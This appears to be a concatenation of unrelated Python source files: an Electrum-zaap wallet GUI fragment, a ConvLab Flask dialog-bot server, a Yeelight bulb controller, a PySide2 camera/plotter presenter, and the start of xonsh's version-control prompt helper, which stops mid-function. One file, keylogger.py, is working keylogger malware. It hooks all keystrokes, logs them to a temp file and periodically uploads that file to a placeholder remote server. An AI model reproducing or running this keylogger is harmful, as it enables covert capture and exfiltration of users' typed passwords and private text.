from uix.dialogs.settings import SettingsDialog
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
        ''' Initialize the UX part of Electrum. This function performs the basic
        tasks of setting up the UI.
'''
from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_zaap_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_zaap_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.icon = "icons/electrum-zaap.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging (%d blocks)"%server_lag)
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
status = str(text.strip() + ' ' + self.base_unit)
else:
status = _("Disconnected")
n = self.wallet.basename()
self.status = '[size=15dp]%s[/size]\n%s' %(n, status)
#fiat_balance = self.fx.format_amount_and_units(c+u+x) or ''
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum-zaap', message,
app_icon=icon, app_name='Electrum-zaap')
except ImportError:
            Logger.error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
# workaround p4a bug:
# show an empty info bubble, to refresh the display
self.show_info_bubble('', duration=0.1, pos=(0,0), width=1, arrow_pos=None)
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
        ''' Show an error message bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
        ''' Show an info message bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
        '''Method to show an information bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
@profiler
def amount_dialog(self, screen, show_max):
from uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def protected(self, msg, f, args):
if self.wallet.has_password():
self.password_dialog(msg, f, args)
else:
f(*(args + (None,)))
def delete_wallet(self):
from uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = os.path.basename(self.wallet.storage.path)
self.protected(_("Enter your PIN code to confirm deletion of %s") % basename, self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def change_password(self, cb):
if self.wallet.has_password():
self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
else:
self._change_password(cb, None)
def _change_password(self, cb, old_password):
if self.wallet.has_password():
if old_password is None:
return
try:
self.wallet.check_password(old_password)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))
def _change_password2(self, cb, old_password, new_password):
self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))
def _change_password3(self, cb, old_password, new_password, confirmed_password):
if new_password == confirmed_password:
self.wallet.update_password(old_password, new_password)
cb()
else:
self.show_error("PIN numbers do not match")
def password_dialog(self, msg, f, args):
def callback(pw):
Clock.schedule_once(lambda _: f(*(args + (pw,))), 0.1)
if self._password_dialog is None:
from uix.dialogs.password_dialog import PasswordDialog
self._password_dialog = PasswordDialog()
self._password_dialog.init(msg, callback)
self._password_dialog.open()
|
bot_server.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import sys
sys.path.append('../../')
from convlab.agent import Body
from convlab.agent import DialogAgent
from convlab.spec import spec_util
from convlab.env import make_env
import time
import numpy as np
import copy
from flask import Flask, request, jsonify
from queue import PriorityQueue
from threading import Thread
import torch
rgi_queue = PriorityQueue(maxsize=0)
rgo_queue = PriorityQueue(maxsize=0)
app = Flask(__name__)
os.environ['lab_mode'] = 'eval'
spec_file = sys.argv[1]
spec_name = sys.argv[2]
lab_mode = sys.argv[3]
if '@' in lab_mode:
lab_mode, prename = lab_mode.split('@')
spec = spec_util.get_eval_spec(spec_file, spec_name, prename)
else:
spec = spec_util.get(spec_file, spec_name)
# # lab_mode, prename = sys.argv[3].split('@')
# spec = spec_util.get_eval_spec(spec_file, prename)
spec = spec_util.override_eval_spec(spec)
agent_spec = spec['agent'][0]
env = make_env(spec)
body = Body(env, spec['agent'])
agent = DialogAgent(spec, body)
# last_obs = 'hi'
# agent.reset(last_obs)
# obs = 'hi can you find me a hotel in the west?'
# action = agent.act(obs)
# next_obs = 'we have six people'
# agent.update(obs, action, 0, next_obs, 0)
# action = agent.act(next_obs)
global_counter = 0
@app.route('/', methods=['GET', 'POST'])
def process():
global global_counter
try:
in_request = request.json
print(in_request)
except:
return "invalid input: {}".format(in_request)
global_counter += 1
rgi_queue.put((global_counter, in_request))
# rgi_queue.join()
output = rgo_queue.get()
print(output['response'])
rgo_queue.task_done()
# return jsonify({'response': response})
return jsonify(output)
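# For reference, the endpoint expects a JSON body shaped roughly like
#   {"input": "<user utterance>", "agent_state": {}}      # first turn
#   {"input": "<user utterance>", "agent_state": [...]}   # later turns, echoing back the previous
#                                                         # reply's (state, prev_active_domain,
#                                                         #          context_input_ids, context_input_len)
# and replies with {"response": ..., "agent_state": ...} as produced by generate_response below.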
def generate_response(in_queue, out_queue):
while True:
# pop input
last_action = 'null'
_, in_request = in_queue.get()
obs = in_request['input']
if in_request['agent_state'] == {}:
agent.reset(obs)
else:
state, prev_active_domain, context_input_ids, context_input_len = in_request['agent_state']
# agent.body.encoded_state = np.asarray(encoded_state) if isinstance(encoded_state, list) else encoded_state
# agent.dst.state = copy.deepcopy(dst_state)
agent.algorithm.policy.state = copy.deepcopy(state)
agent.algorithm.policy.prev_active_domain = copy.deepcopy(prev_active_domain)
agent.algorithm.policy.context_input_ids = torch.tensor(context_input_ids).to('cuda')#[torch.tensor(i).to('cuda') for i in context_input_ids]
agent.algorithm.policy.context_input_len = torch.tensor(context_input_len).to('cuda')
agent.update(obs, last_action, 0, obs, 0)
try:
action = agent.act(obs)
# encoded_state = agent.body.encoded_state.tolist() if isinstance(agent.body.encoded_state,
# np.ndarray) else agent.body.encoded_state
# dst_state = copy.deepcopy(agent.dst.state)
state = copy.deepcopy(agent.algorithm.policy.state)
prev_active_domain = copy.deepcopy(agent.algorithm.policy.prev_active_domain)
context_input_ids = copy.deepcopy(agent.algorithm.policy.context_input_ids.tolist())#[i.tolist() for i in agent.algorithm.policy.context_input_ids]
context_input_len = copy.deepcopy(agent.algorithm.policy.context_input_len.tolist())
# print(state, prev_active_domain, context_input_ids, context_input_len)
# asdfasdf
except Exception as e:
print('agent error', e)
try:
if action == '':
response = 'Sorry I do not understand, can you paraphrase?'
else:
response = action
except Exception as e:
print('Response generation error', e)
response = 'What did you say?'
last_action = action
out_queue.put({'response': response, 'agent_state': (state, prev_active_domain, context_input_ids, context_input_len)})
in_queue.task_done()
# out_queue.join()
if __name__ == '__main__':
worker = Thread(target=generate_response, args=(rgi_queue, rgo_queue,))
worker.setDaemon(True)
worker.start()
app.run(host='0.0.0.0', port=10004)
|
YeelightServer.py
|
import time
import re
import json
import socket
import threading
import base64
import logging
import urllib
import sys
import errno
from thirdparty.YLBaseServer import YLBaseServer
reload(sys)
sys.setdefaultencoding('utf8')
class Message:
def __str__(self):
return ' '.join(['%s:%s' % item for item in self.__dict__.items()])
class YeelightException(Exception):
pass
class Yeelight(object):
@property
def location(self):
return self._location
@location.setter
def location(self, value):
self._location = value
@property
def id(self):
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = base64.b64decode(value)
@property
def power(self):
return self._power
@power.setter
def power(self, value):
self._power = value
@property
def bright(self):
return self._bright
@bright.setter
def bright(self, value):
self._bright = value
@property
def hue(self):
return self._hue
@hue.setter
def hue(self, value):
self._hue = value
@property
def sat(self):
return self._sat
@sat.setter
def sat(self, value):
self._sat = value
@property
def rgb(self):
return self._rgb
@rgb.setter
def rgb(self, value):
self._rgb = value
@property
def model(self):
return self._model
@model.setter
def model(self, value):
self._model = value
@property
def color_mode(self):
return self._color_mode
@color_mode.setter
def color_mode(self, value):
self._color_mode = value
def to_dict(self):
dict = {}
for item in self.__dict__.items():
key, value = item
# first char _
dict[key[1:]] = value
return dict
def __str__(self):
return '\n'.join(['%s:%s' % item for item in self.__dict__.items()])
class YeelightClient(object):
def __init__(self, addr):
self._addr = addr
self._host, self._port = addr.split(':')
self._connected = False
self._thread = None
self._sock = None
def run(self):
try:
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.connect((self._host, int(self._port)))
self._thread = threading.Thread(target=self._run)
self._thread.setDaemon(True)
self._thread.start()
self._connected = True
except socket.error, e:
raise YeelightException('%s(%s)' % (self._addr, e))
def _run(self):
while self._connected:
try:
response = self._sock.recv(2048)
if not response:
break
self._sock.settimeout(None)
logging.debug('<< Yeelight Light Received: %s', response)
obj = json.loads(response)
method = obj.get('method', None)
if method == 'props':
params = obj.get('params', None)
if params:
# self._light.name = params.get('name', self._light.name)
self._light.power = params.get(
'power', self._light.power)
# self._light.model = params.get('model', self._light.model)
self._light.color_mode = params.get(
'color_mode', self._light.color_mode)
self._light.rgb = params.get('rgb', self._light.rgb)
self._light.hue = params.get('hue', self._light.hue)
self._light.sat = params.get('sat', self._light.sat)
self._light.bright = params.get(
'bright', self._light.bright)
except socket.error, e:
err = e.args[0]
if err == errno.EAGAIN or err == errno.EWOULDBLOCK:
break
logging.error('-- Yeelight (%s)', e)
def modify_light(self, data):
pass
def send(self, data):
'''send command to Yeelight'''
if self._connected:
try:
self._sock.send(data)
except socket.error, e:
self._connected = False
logging.error('-- Yeelight (%s)', e)
def close(self):
self._connected = False
self._sock.close()
@property
def addr(self):
'''address host:port'''
return self._addr
@property
def is_connected(self):
'''client is connected'''
return self._connected
@property
def light(self):
return self._light
@light.setter
def light(self, value):
self._light = value
class YeelightServer(YLBaseServer):
SUDDEN = 'sudden'
# gradual fashion
SMOOTH = 'smooth'
# success
OK = 'HTTP/1.1 200 OK'
# ssdp search
SEARCH = 'M-SEARCH * HTTP/1.1'
# ssdp notify
NOTIFY = 'NOTIFY * HTTP/1.1'
# default Light addr
HOST_LIGHT = '239.255.255.250'
PORT_LIGHT = 1982
# carriage return
CR = '\r'
# line feed
LF = '\n'
# CR + LF line terminator
CRLF = CR + LF
def __init__(self):
self._socket_scan = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._light_clients = []
# Light prop
# def get_props(self, addr):
# try:
# props = {'prop': ['name', 'power', 'hue', 'sat', 'rgb', 'bright']}
# ret = self.get_prop(addr, props)
# if ret:
# result = json.loads(ret).get('result', [])
# if len(result) > 0:
# for light in self._lights:
# if light.location == addr:
# light.name = result[0]
# light.power = result[1]
# light.hue = result[2]
# light.sat = result[3]
# light.rgb = result[4]
# light.bright = result[5]
# break
# return ret
# except Exception, e:
# logging.error(e)
# Light command get_prop
def get_prop(self, addr, arg):
return self._cmd(addr, 'get_prop', arg.get('prop', []))
# Light command set_scene
def set_scene(self, addr, arg):
return self._cmd(addr, 'set_scene', arg.get('class', []))
# Light command power_on
def power_on(self, addr, arg):
return self.set_power(addr, 'on', arg.get('effect', self.SMOOTH), arg.get('duration', 500))
# Light command power_off
def power_off(self, addr, arg):
return self.set_power(addr, 'off', arg.get('effect', self.SMOOTH), arg.get('duration', 500))
# Light command set_power
def set_power(self, addr, stat, effect, duration):
return self._cmd(addr, 'set_power', [stat, effect, duration])
# Light command start_cf
def start_cf(self, addr, arg):
return self._cmd(addr, 'start_cf', [arg.get('count', 0), arg.get('action', 0), arg.get('flow_expression', "")])
# Light command stop_cf
def stop_cf(self, addr, arg):
return self._cmd(addr, 'stop_cf', [])
# Light command cron_add
def cron_add(self, addr, arg):
return self._cmd(addr, 'cron_add', [0, arg.get('value', 0)])
# Light command cron_get
def cron_get(self, addr, arg):
return self._cmd(addr, 'cron_get', [0])
# Light command cron_del
def cron_del(self, addr, arg):
return self._cmd(addr, 'cron_del', [0])
# Light command set_adjust
def set_adjust(self, addr, arg):
return self._cmd(addr, 'set_adjust', [arg.get('action', 'increase'), arg.get('prop', 'bright')])
# Light command set_bright
def set_bright(self, addr, arg):
return self._cmd(addr, 'set_bright', [arg.get('brightness', 30), arg.get('effect', self.SMOOTH), arg.get('duration', 500)])
# Light command set_rgb
def set_rgb(self, addr, arg):
return self._cmd(addr, 'set_rgb', [arg.get('rgb', 16777215), arg.get('effect', self.SMOOTH), arg.get('duration', 500)])
# Light command set_hsv
def set_hsv(self, addr, arg):
return self._cmd(addr, 'set_hsv', [arg.get('hue', 0), arg.get('sat', 0), arg.get('effect', self.SMOOTH), arg.get('duration', 500)])
# Light command set_ct_abx
def set_ct_abx(self, addr, arg):
return self._cmd(addr, 'set_ct_abx', [arg.get('ct_value', 1700), arg.get('effect', self.SMOOTH), arg.get('duration', 500)])
# Light command set_default
def set_default(self, addr, arg):
return self._cmd(addr, 'set_default', [])
# Light command toggle
def toggle(self, addr, arg):
return self._cmd(addr, 'toggle', [])
# Light command set_name
def set_name(self, addr, arg):
return self._cmd(addr, 'set_name', [base64.b64encode(arg.get('name', 'noname'))])
# Light command set_music
def set_music(self, addr, arg):
pass
def get_devices(self, *args):
pass
# Light command search
def search(self, *args):
command = self.SEARCH + self.CRLF + \
'HOST: %s:%s' % (self.HOST_LIGHT, self.PORT_LIGHT) + self.CRLF + \
'MAN: "ssdp:discover"' + self.CRLF + \
'ST: wifi_bulb' + self.CRLF
logging.debug('>> Yeelight Search %s',
re.compile('[\r\n]').sub(' ', command))
self._socket_scan.sendto(
command, 0, (self.HOST_LIGHT, self.PORT_LIGHT))
return 'ok'
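# The rendered discovery datagram is plain SSDP text, i.e. the bytes sent are:
#   M-SEARCH * HTTP/1.1\r\n
#   HOST: 239.255.255.250:1982\r\n
#   MAN: "ssdp:discover"\r\n
#   ST: wifi_bulb\r\n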
# control command
def ccmd(self, location, method, param):
param = param or {}
try:
obj = json.loads(urllib.unquote(param))
except Exception, e:
obj = {}
try:
return getattr(self, method)(location, obj)
except socket.error, e:
logging.error('-- Yeelight connect(%s)', e)
except Exception, e:
logging.error('-- Yeelight method(%s)', e)
# get connect light client
def _get_light_client(self, addr, is_new=False):
ret_client = None
lost_client = None
for client in self._light_clients:
if client.addr == addr:
if client.is_connected:
ret_client = client
else:
lost_client = client
break
if lost_client:
'''remove lost connection'''
self._light_clients.remove(lost_client)
if not ret_client and not is_new:
raise YeelightException('%s not found!' % addr)
if is_new and not ret_client:
ret_client = YeelightClient(addr)
self._light_clients.append(ret_client)
return ret_client
# parse header
def _parse(self, data):
message = Message()
try:
headers = data.split(self.LF)
if headers and len(headers) > 0:
for header in headers:
header = header.strip()
if header == '':
continue
kv = header.split(':', 1)
if kv and len(kv) > 1:
key = kv[0].strip().lower()
value = kv[1].strip()
else:
key = 'status'
value = kv[0]
setattr(message, key, value)
except Exception, e:
logging.error('-- Yeelight (%s)', e)
return message
# send command to Light
def _cmd(self, addr, method, data):
str = json.dumps(
{'id': int(time.time()), 'method': method, 'params': data})
logging.debug('>> Yeelight Send command %s [%s]', addr, str)
try:
light_client = self._get_light_client(addr)
light_client.send(str + self.CRLF)
return 'ok'
except Exception, e:
logging.error('-- Yeelight (%s)', e)
return 'error'
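# For illustration, set_bright(addr, {'brightness': 30}) would serialise to
# something like {"id": 1650000000, "method": "set_bright", "params": [30, "smooth", 500]}
# (the id value here is a hypothetical unix timestamp), followed by CRLF, written
# to the bulb's TCP control socket via the matching YeelightClient.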
# discover
def _discover(self, message):
try:
if not hasattr(message, 'location'):
logging.debug(
'-- Yeelight Not Yeelight message, drop it (%s)', message)
return
match = re.match(
r'yeelight://[0-9]{1,3}(\.[0-9]{1,3}){3}:([0-9]*)', message.location)
if match is None:
return
addr = message.location.split('//')[1]
light = Yeelight()
light.id = message.id
light.name = message.name
light.power = message.power
light.location = addr
light.model = message.model
light.color_mode = message.color_mode
light.rgb = message.rgb
light.hue = message.hue
light.sat = message.sat
light.bright = message.bright
except Exception, e:
logging.error('-- Yeelight Parse light error(%s)', e)
try:
client = self._get_light_client(addr, True)
client.light = light
client.run()
except YeelightException, e:
logging.error('-- Yeelight Build client error(%s)', e)
# empty
def _empty(self, *args):
logging.debug('-- Yeelight Empty: %s', args)
def get_local_ip(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect(('8.8.8.8', 80))
(addr, port) = sock.getsockname()
sock.close()
return addr
# _start_scan server
def _start_scan(self):
while True:
try:
data, addr = self._socket_scan.recvfrom(2048)
logging.debug('<< Yeelight Scanner Received:%s from %s',
re.compile('[\r\n]').sub(' ', data), addr)
self._discover(self._parse(data))
except socket.error, e:
pass
self._socket_scan.close()
# passive server
def _start_passive(self):
local_ip = self.get_local_ip()
self._socket_passive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket_passive.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# bind
self._socket_passive.bind(('', self.PORT_LIGHT))
# add Light mcast
self._socket_passive.setsockopt(socket.SOL_IP, socket.IP_ADD_MEMBERSHIP,
socket.inet_aton(self.HOST_LIGHT) + socket.inet_aton(local_ip))
while True:
try:
data, addr = self._socket_passive.recvfrom(2048)
logging.debug('<< Yeelight Passive Received:%s from %s',
re.compile('[\r\n]').sub(' ', data), addr)
self._discover(self._parse(data))
except socket.error, e:
logging.error('-- Yeelight (%s)', e)
# leave Light mcast
self._socket_passive.setsockopt(socket.SOL_IP, socket.IP_DROP_MEMBERSHIP,
socket.inet_aton(self.HOST_LIGHT) +
socket.inet_aton(local_ip))
self._socket_passive.close()
def startup(self):
# passive create thread
t1 = threading.Thread(target=self._start_passive)
t1.setDaemon(True)
t1.start()
# scan create thread
t2 = threading.Thread(target=self._start_scan)
t2.setDaemon(True)
t2.start()
self.search()
def handle(self, args):
method = args.get('method')
ret = self.ccmd(args.get('location'), method, args.get('param'))
if method == 'get_devices':
result = []
for client in self._light_clients:
result.append(client.light.to_dict())
return result
return ret
def name(self):
return 'Yeelight'
|
Presenter.py
|
# This Python file uses the following encoding: utf-8
import threading
from PySide2.QtCore import Slot, Signal, QObject, QThread
from PySide2.QtGui import QImage
import Camera
import ImageProcessor
import SerialCommunicator
class Presenter(QObject):
'''
Main class for model-view communications
It communicates via QT Signals and Slots
'''
newFrame = Signal()
finishedStreaming = Signal()
startedStreaming = Signal()
cameraClosed = Signal()
progressUpdate = Signal(float)
plottingStarted = Signal()
plottingStopped = Signal()
serialPorts = Signal(str)
connectionTimeout = Signal(str)
def __init__(self):
QObject.__init__(self)
self.processor = ImageProcessor.ImageProcessor()
self.serial = SerialCommunicator.SerialCommunicator()
self.thread = None
self.camera = None
self.isStreaming = False
self.isCameraOpen = False
self.startCamera()
@Slot()
def startCamera(self):
if not self.isCameraOpen:
self.camera = Camera.Camera()
self.thread = QThread()
self.camera.moveToThread(self.thread)
self.camera.newImage.connect(self.newFrame)
self.camera.released.connect(self.thread.quit)
self.camera.finishedStreaming.connect(self.finishedStreaming)
self.thread.started.connect(self.camera.stream)
self.thread.finished.connect(self.cameraClosed)
self.thread.start()
self.camera.streaming = True
self.isStreaming = True
self.isCameraOpen = True
self.startedStreaming.emit()
@Slot()
def stopCamera(self):
if self.isStreaming:
self.isStreaming = False
self.camera.stop()
elif self.isCameraOpen:
self.isCameraOpen = False
self.camera.release()
@Slot()
def processImage(self):
image = self.processor.process(Camera.global_image)
image = QImage(image.data, image.shape[1], image.shape[0], QImage.Format_BGR888)
self.camera.changeGlobalImage(image)
self.getSerialPorts()
self.stopCamera()
@Slot(str)
def startPlotting(self, port):
print("Selected Port: ", port)
self.serial.progressUpdate.connect(self.progressUpdate)
self.serial.plottingStarted.connect(self.plottingStarted)
self.serial.connectionTimeout.connect(self.connectionTimeout)
self.serial.plottingStopped.connect(self.plottingStopped)
thread_gcode = threading.Thread(target=self.serial.sendGcode, args=(port, ), daemon=True)
thread_gcode.start()
@Slot(int, int)
def openPreviewImage(self, width, height):
if not self.isCameraOpen:
self.processor.openPreviewImage(width, height)
def getSerialPorts(self):
ports = self.serial.getSerialPorts()
for port in ports:
self.serialPorts.emit(port)
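# A minimal hookup sketch (the `view` object and the port name are hypothetical):
#   presenter = Presenter()
#   presenter.newFrame.connect(view.updateFrame)
#   presenter.progressUpdate.connect(view.onProgress)
#   presenter.startPlotting('COM3')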
|
keylogger.py
|
import pythoncom, pyHook, requests
import tempfile
import threading
import time
def keyPressed(event):
global store
mappings = {8: "<backspace>", 13: "\n", 27: "<esc>", 32: " ", 46: "<del>", 91: "<win>",
160: "<shft>", 162: "<ctrl>", 163: "<r-ctrl>", 164: "<alt>", 165: "<ralt>", 9: "<tab>",
48: "0", 49: "1", 50: "2", 51: "3", 52: "4", 53: "5", 54: "6", 55: "7", 56: "8", 57: "9",
37: "←", 38: "↑", 39: "→", 40: "↓",
192: "ö", 222: "ä", 186: "ü", 187: "+", 191: "#",
188: ",", 190: ".", 189: "-", 219: "ß", 221: "´", 107: "+", 109: "-", 111: "/", 106: "*"
}
try:
id = event.KeyID
if not id in mappings:
char = chr(id).lower()
else:
char = mappings.get(id)
store = store + char
fp = open(tempfile.gettempdir()+'\\logs_windows.txt','w+')
print(char,end='')
fp.write(store)
fp.close()
except Exception as e:
print(str(e))
return True
def uploadFile():
while True:
time.sleep(30)
try:
url = 'https://your_server_address/python_file.php'
files = {'file': open(tempfile.gettempdir()+'\\logs_windows.txt', 'rb')}
r = requests.post(url, files=files)
print(str(r.text))
except:
pass
store = ''
t1 = threading.Thread(target=uploadFile)
t1.start()
obj = pyHook.HookManager()
obj.KeyDown = keyPressed
obj.HookKeyboard()
pythoncom.PumpMessages()
|
vc.py
|
# -*- coding: utf-8 -*-
"""Prompt formatter for simple version control branches"""
# pylint:disable=no-member, invalid-name
import os
import sys
import queue
import builtins
import threading
import subprocess
import re
import pathlib
import xonsh.tools as xt
from xonsh.lazyasd import LazyObject
RE_REMOVE_ANSI = LazyObject(
lambda: re.compile(r"(?:\x1B[@-_]|[\x80-\x9F])[0-?]*[ -/]*[@-~]"),
globals(),
"RE_REMOVE_ANSI",
)
def _get_git_branch(q):
denv = builtins.__xonsh__.env.detype()
try:
cmd = ["git", "rev-parse", "--abbrev-ref", "HEAD"]
branch = xt.decode_bytes(
subprocess.check_output(cmd, env=denv, stderr=subprocess.DEVNULL)
)
branch = branch.splitlines()[0] or None
except (subprocess.CalledProcessError, OSError, FileNotFoundError):
q.put(None)
else:
q.put(branch)
def get_git_branch():
"""Attempts to find the current git branch. If this could not
be determined (timeout, not in a git repo, etc.) then this returns None.
"""
branch = None
timeout = builtins.__xonsh__.env.get("VC_BRANCH_TIMEOUT")
q = queue.Queue()
t = threading.Thread(target=_get_git_branch, args=(q,))
t.start()
t.join(timeout=timeout)
try:
branch = q.get_nowait()
if branch:
branch = RE_REMOVE_ANSI.sub("", branch)
except queue.Empty:
branch = None
return branch
def _get_hg_root(q):
_curpwd = builtins.__xonsh__.env["PWD"]
while True:
